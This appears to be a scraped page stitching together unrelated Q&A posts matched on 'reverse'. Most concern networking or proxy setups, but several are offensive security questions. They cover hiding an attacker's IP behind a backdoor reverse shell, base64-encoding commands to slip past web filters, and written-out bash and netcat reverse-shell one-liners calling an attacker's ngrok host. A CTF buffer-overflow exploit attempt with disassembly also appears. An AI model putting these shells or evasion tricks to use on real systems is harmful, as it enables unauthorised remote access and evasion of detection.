networking – SharePoint – Publish internet site with reverse proxy, NTLM Authentication , and FBA

I need to publish a SharePoint internet web site by implementing the three-tier network zoning, it will be determined as follows:

1- Reverse Proxy Server resides in Internet DMZ Zone.

2- All SharePoint Servers (Application & WFE) will reside in the internnal network.

3- Database servers (clustered) will reside in another protected zone, and connections are made through a specific port (as mentioned in the securirty hardeding plan by Microsoft)

My question: is it possible to get my internet web site work normally with NTLM authentication and FBA after exposing the WFE to the internet via Reverse Proxy?, knowing that my web application is configured to use Claims Based Authentication (NTLM + FBA). or is there a specific configuration that needs to be applied on the Reverse Proxy Server to get the web site work properly using NTLM and FBA?

Reverse shell from backdoor – exposing attacker? [duplicate]

If an attacker successfully installed a backdoor that connects to his computer via a reverse shell, how can the attacker hide his IP address?

I’d guess he can’t use Tor or a VPN, because packet forwarding would be quite impossible (is that correct?). Maybe he can use a different bought or hacked server as a proxy? How would he achieve that?

How can the attacker stay anonymous?

reverse proxy – Connecting with https to a server application on GCE VM through ngrok tunnel

I am observing a strange behaviour with ngrok on a GCE VM.

I fire up a ‘preemptible’ VM instance with static external ip, and start ngrok on it normally. I get the URL that maps incoming https request to http on localhost. I am also able to check the tunnel and everything is working perfectly fine. I create a snapshot of the bootable disk attached to this VM. I turn off the VM.

Then I create another GCE VM that has exact same configuration, network settings (with a different static ip of course) etc except that I disable the preemtibility. The bootable disk is also created through the snapshot above, so it is the exact replica of the disk for the preemtible VM above. I start ngrok on this non-preemtible machine. Ngrok doesn’t complain anything, it seems to have started a tunnel.

Snapshot of ngrok after starting tunnel on the non-interruptible VM

However, the tunnel doesn’t work.
No tunnel found

Can anyone point me to possibe causes / directions to investigate?

I already tried following with no success:

  1. Logging into ngrok and using ngrok authtoken <token> before starting the tunnel
  2. rewriting the host header: ngrok http -host-header=rewrite localhost:3000

webserver – Will a Web Server detect a base64 encoded reverse shell on run time?

A vulnerable website blocks almost everything that is related to PE (Privilege Escalation), but when encoding the ls -al code into a base64 format, the website doesn’t block the dangerous code (at Scan Time), will the web server detect and block the code at Run Time ?

base64 -d <<< bHMgLWFs | sh: Base64 of ls -al

Web Server: Scanning the input.. Seems fine, I will not block it.

Web Server Inside: ls -al # Will it block it at run time ?

Reverse SEO

What is reverse SEO?

bash – Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

Possible to reverse proxy WP multisite to a separate server with NGINX?

Recently migrated a multisite network, only to discover some of the sites are using a theme that’s incompatible with the server’s PHP version.

While I work on a longterm fix, what I’d like to is use NGINX to reverse proxy the non-working sites to the old server, while keeping the current, working sites pointed to the new server.

When I try the following, I’m able to make it to my old site’s pages, but static assets (js, css, etc.) return 404, and I’m unable to access any /wp-admin pages. What should I change?

location /oldsite {
            proxy_pass http://my.old.ip;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
        }

drm – Can’t one reverse engineering Chrome source code to reveal Widevine and friends keys?

If I understand correctly, Widevine, FairPlay and PlayReady are all security through obscurity. Given the popularity of services using them, can’t someone just RE them and find exactly how their work? If so, was it done? If not, why? If this (can be) done, why people continue using these services?

Related: How does Widevine, FairPlay, and other DRM’s work under the hood?

Reverse sudo – sudo ro untrusted user

I want to split my terminal sessions to different users, to compartmentalize them.

If I sudo -i -u user1 in one terminal window,
can user1 attack my main session?

Everyone talks about sudo to escalate privileges, but I want to reduce them.

reverse engineering – Overwrite return address in C

It’s about a CTF Challenge. I’m trying to execute a buffer overflow attack on a C program. The code is :

#include<stdio.h>
#include<string.h>
#include<stdlib.h>

#include <sys/types.h>
#include <unistd.h>
#include <stdint.h>

int enable_flag() {
   printf("yayn");
   fflush(stdout);
   setreuid(geteuid(), getuid());
   system("chmod 644 flag.txt");
   return 0;
}

void overflow (void* inbuf, int inbuflen) {
   char buf(4);
   memcpy(buf, inbuf, inbuflen);
}

int main (int argc, char** argv) {
   char filebuf(100);
   FILE* file = fopen(argv(1), "r");
   int bytes = fread(filebuf, sizeof(char), 100, file);
   printf("bytes read: %dn", bytes);
   fflush(stdout);
   fclose(file);
   overflow(filebuf, bytes);
   return 0;
}

After running gdb I got :

(gdb) disas main 
    Dump of assembler code for function main:
       0x000000000040123e <+0>: push   %rbp
       0x000000000040123f <+1>: mov    %rsp,%rbp
       0x0000000000401242 <+4>: add    $0xffffffffffffff80,%rsp
       0x0000000000401246 <+8>: mov    %edi,-0x74(%rbp)
       0x0000000000401249 <+11>:    mov    %rsi,-0x80(%rbp)
       0x000000000040124d <+15>:    mov    -0x80(%rbp),%rax
       0x0000000000401251 <+19>:    add    $0x8,%rax
       0x0000000000401255 <+23>:    mov    (%rax),%rax
       0x0000000000401258 <+26>:    lea    0xdbc(%rip),%rsi        # 0x40201b
       0x000000000040125f <+33>:    mov    %rax,%rdi
       0x0000000000401262 <+36>:    callq  0x4010d0 <fopen@plt>
       0x0000000000401267 <+41>:    mov    %rax,-0x8(%rbp)
       0x000000000040126b <+45>:    mov    -0x8(%rbp),%rdx
       0x000000000040126f <+49>:    lea    -0x70(%rbp),%rax
       0x0000000000401273 <+53>:    mov    %rdx,%rcx
       0x0000000000401276 <+56>:    mov    $0x64,%edx
       0x000000000040127b <+61>:    mov    $0x1,%esi
       0x0000000000401280 <+66>:    mov    %rax,%rdi
       0x0000000000401283 <+69>:    callq  0x401040 <fread@plt>
       0x0000000000401288 <+74>:    mov    %eax,-0xc(%rbp)
       0x000000000040128b <+77>:    mov    -0xc(%rbp),%eax
       0x000000000040128e <+80>:    mov    %eax,%esi
       0x0000000000401290 <+82>:    lea    0xd86(%rip),%rdi        # 0x40201d
       0x0000000000401297 <+89>:    mov    $0x0,%eax
       0x000000000040129c <+94>:    callq  0x401080 <printf@plt>
       0x00000000004012a1 <+99>:    mov    0x2dd8(%rip),%rax        # 0x404080     <stdout@@GLIBC_2.2.5>
       0x00000000004012a8 <+106>:   mov    %rax,%rdi
       0x00000000004012ab <+109>:   callq  0x4010b0 <fflush@plt>
       0x00000000004012b0 <+114>:   mov    -0x8(%rbp),%rax
       0x00000000004012b4 <+118>:   mov    %rax,%rdi
       0x00000000004012b7 <+121>:   callq  0x401050 <fclose@plt>
       0x00000000004012bc <+126>:   mov    -0xc(%rbp),%edx
       0x00000000004012bf <+129>:   lea    -0x70(%rbp),%rax
       0x00000000004012c3 <+133>:   mov    %edx,%esi
       0x00000000004012c5 <+135>:   mov    %rax,%rdi
       0x00000000004012c8 <+138>:   callq  0x401213 <overflow>
       0x00000000004012cd <+143>:   mov    $0x0,%eax
       0x00000000004012d2 <+148>:   leaveq 
       0x00000000004012d3 <+149>:   retq   
    End of assembler dump.(gdb) disas main

disas overflow gives :

(gdb) disas overflow
Dump of assembler code for function overflow:
   0x0000000000401213 <+0>: push   %rbp
   0x0000000000401214 <+1>: mov    %rsp,%rbp
   0x0000000000401217 <+4>: sub    $0x20,%rsp
   0x000000000040121b <+8>: mov    %rdi,-0x18(%rbp)
   0x000000000040121f <+12>:    mov    %esi,-0x1c(%rbp)
   0x0000000000401222 <+15>:    mov    -0x1c(%rbp),%eax
   0x0000000000401225 <+18>:    movslq %eax,%rdx
   0x0000000000401228 <+21>:    mov    -0x18(%rbp),%rcx
   0x000000000040122c <+25>:    lea    -0x4(%rbp),%rax
   0x0000000000401230 <+29>:    mov    %rcx,%rsi
   0x0000000000401233 <+32>:    mov    %rax,%rdi
   0x0000000000401236 <+35>:    callq  0x4010a0 <memcpy@plt>
   0x000000000040123b <+40>:    nop
   0x000000000040123c <+41>:    leaveq 
   0x000000000040123d <+42>:    retq   
End of assembler dump.

and disas enable_flag gives :

Dump of assembler code for function enable_flag:
   0x00000000004011c2 <+0>: push   %rbp
   0x00000000004011c3 <+1>: mov    %rsp,%rbp
   0x00000000004011c6 <+4>: push   %rbx
   0x00000000004011c7 <+5>: sub    $0x8,%rsp
   0x00000000004011cb <+9>: lea    0xe32(%rip),%rdi        # 0x402004
   0x00000000004011d2 <+16>:    callq  0x401030 <puts@plt>
   0x00000000004011d7 <+21>:    mov    0x2ea2(%rip),%rax        # 0x404080 <stdout@@GLIBC_2.2.5>
   0x00000000004011de <+28>:    mov    %rax,%rdi
   0x00000000004011e1 <+31>:    callq  0x4010b0 <fflush@plt>
   0x00000000004011e6 <+36>:    callq  0x401060 <getuid@plt>
   0x00000000004011eb <+41>:    mov    %eax,%ebx
   0x00000000004011ed <+43>:    callq  0x401090 <geteuid@plt>
   0x00000000004011f2 <+48>:    mov    %ebx,%esi
   0x00000000004011f4 <+50>:    mov    %eax,%edi
   0x00000000004011f6 <+52>:    callq  0x4010c0 <setreuid@plt>
   0x00000000004011fb <+57>:    lea    0xe06(%rip),%rdi        # 0x402008
   0x0000000000401202 <+64>:    callq  0x401070 <system@plt>
   0x0000000000401207 <+69>:    mov    $0x0,%eax
   0x000000000040120c <+74>:    add    $0x8,%rsp
   0x0000000000401210 <+78>:    pop    %rbx
   0x0000000000401211 <+79>:    pop    %rbp
   0x0000000000401212 <+80>:    retq   
End of assembler dump.

I followed this tutorial Introduction to return oriented programming but I’m getting always segmentation fault

I have tried this:

./rop.o "$(python3 -c 'print ("A"*0x4 + "BBBB" + "xc2x11x40")')"